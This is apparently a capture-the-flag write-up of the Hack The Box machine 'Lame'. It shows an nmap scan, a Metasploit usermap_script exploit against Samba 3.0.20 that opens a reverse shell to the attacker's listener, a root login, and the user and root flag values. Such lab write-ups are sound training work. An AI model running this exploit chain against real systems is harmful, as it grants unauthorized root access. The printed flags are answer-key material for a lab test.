NMAP:

root@37f72653a832:/# nmap -sC -sV -T4 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 22:05 UTC
Nmap scan report for 10.10.10.3
Host is up (0.15s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.37
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -3d00h55m17s, deviation: 2h49m43s, median: -3d02h55m18s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-05-11T15:10:24-04:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.12 seconds

Few ports open. My first thought was FTP since it was running the imfamous vsftpd 2.3.4 but it seems the backdoor was patched. Next step was to check out SMB which is running version 3.0.20. Turns out metasploit as an exploit for exactly that version. Using exploit/multi/samba/usermap_script I get a root shell

msf5 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 10.10.14.37:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo yPjA6YJDGlzgt172;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "yPjA6YJDGlzgt172\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.37:4444 -> 10.10.10.3:46649) at 2020-05-14 22:20:07 +0000

whoami
root

From here I can read the user.txt and root.txt flags.

cat /home/makis/user.txt
69454a937d04f5f0225ea00acd2e84c5
cat /root/root.txt
92caac3be240ef409e45721348a4e9df